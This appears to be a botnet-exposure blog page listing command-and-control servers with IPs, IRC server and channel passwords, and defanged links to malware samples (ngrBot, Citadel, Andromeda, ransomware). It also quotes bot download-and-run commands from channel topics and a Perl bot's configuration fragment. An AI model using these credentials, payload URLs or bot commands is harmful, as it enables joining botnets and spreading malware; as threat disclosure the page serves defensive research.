Big heckers big net. Thnx to loadx and Yewnix for the ownage and exposing them. Everything is inside the config file: /* Type of comments */ #Comment type 1 (Shell type) // Comment type 2(C++ style) /* Comment type 3 (C Style) */ #those lines are ignored by the ircd. loadmodule "src/modules/commands.so"; #loadmodule "cloak.dll"; #includeRead more...
92.48.86.88(Aspergillus mod hosted in United Kingdom Maidenhead Simply Transit Ltd)
Thanx to loadx for finding this botnet. 92.48.86.88:81PASS adobe2.tmp NICK n[USA|XP]339728 USER 3397 “” “win” :3397 JOIN #s jobs Now talking in #s Topic On: [#s ] [ !dl hxxp://www.divshare.com/direct/24632542-a3c.tee ] Topic By: [ x ] hosting infos: http://whois.domaintools.com/92.48.86.88
dd.sult4n.net(ngrBot hosted in United States Chicago Steadfast Networks)
Thanks to anonymous guy here for finding this botnet. Resolved : [dd.sult4n.net] To [67.202.92.70] Resolved : [www.8rb.su] To [67.202.92.70] Other domains: xx.sult4n.net, x.sult4n.net Thnx to Userbased for this and for server and channel pass Server : dd.sult4n.net:4040 PASS sulxx Channel : #m PASS sul111 Now talking in #m Topic On: [ #m ] [ !mod usbiRead more...
88.39mb samples
Another package with diferent samples for analysis purposes. Have fun. Samples
103.241.0.100(Citadel 1.3.5.1 hosted in Net Origin Group Pty Ltd)
Found by justaguy belgian pigs farmer lol. This is the install directory : hxxp://103.241.0.100/images/gallery/install/ This is the gate : hxxp://103.241.0.100/images/gallery/gate.php Here the sample Hosting infos: http://whois.domaintools.com/103.241.0.100
213.133.111.10(Ransomware hosted in Germany Nuremberg Hetzner Online Ag)
Here u can see the page where u are asked to pay via paysafecard for your illegal activities lol : http://213.133.111.10/panel/landing/gate.php Alot of directories are not protected so u can search for more. For the sample here Hosting infos: http://whois.domaintools.com/213.133.111.10
EpicBot v1.0 by h22turbo(hosted in United Kingdom Derby Webfusion Internet Solutions)
Perl bot found by Yewnix my @adms=(“Darkone”);my @canais=(“#dark7887”);my @nickname = (“DARK”);my $nick = $nickname[rand scalar @nickname];my $ircname =’dark’;chop (my $realname = `uname -a`);$servidor=’dark86.no-ip.org’ unless $servidor;my $porta=’7000′; Source EpicBot hosting infos: http://whois.domaintools.com/91.109.4.212
Autoit Bot
Found this sample and decompiled so have fun with the source wich is partially encrypted. Here the sample: hxxp://93.57.18.211/bot.exe And here the source decompiled and partially encrypted with BitXOR password for the link is : exposedbotnets
voscomptesenligne.eu(Andromeda Bot hosted in Netherlands International Widespread Services Limited)
Sample found by ALiSs urls’s: hxxp://voscomptesenligne.eu/joomla/image.php hxxp://www.curboc.com/joomla/image.php Plugins: hxxp://voscomptesenligne.eu/joomla/f.pack hxxp://voscomptesenligne.eu/joomla/s.pack hxxp://voscomptesenligne.eu/joomla/r.pack hxxp://www.curboc.com /joomla/f.pack hxxp://www.curboc.com /joomla/s.pack hxxp://www.curboc.com /joomla/r.pack hxxp://voscomptesenligne.eu/joomla/fg.php?id=1880376902 Love Poem dedicated to Brian Krebs here: hxxp://voscomptesenligne.eu/ Same Poem here : hxxp://www.curboc.com Samples: hxxp://91.223.82.147/andro.exe hxxp://www.curboc.com/andro.exe hxxp://www.curboc.com/miner.exe hxxp://voscomptesenligne.eu/miner.exe miner.exe downloads: hxxp://93.113.171.18/upl/pYofXDkAVERHbkeo/m.jpg (www.fisier.ro) hosting infos: http://whois.domaintools.com/91.223.82.179
178.86.23.225(ngrBot hosted in Ukraine Odessa Tehnologii Budushego Llc)
Botnet found by rolls Server: 178.86.23.225:1875 Server Password: Username: uiswnri Nickname: n{DE|XPa}uiswnri Channel: #moon (Password: 4m3r1k) Channeltopic: :.up hxxp://wachalol.com/images/180713.exe b2790c7513a2efbf7cb34f64c4f49ff0 Inactive domain :harlan10.com hosting infos: http://whois.domaintools.com/178.86.23.225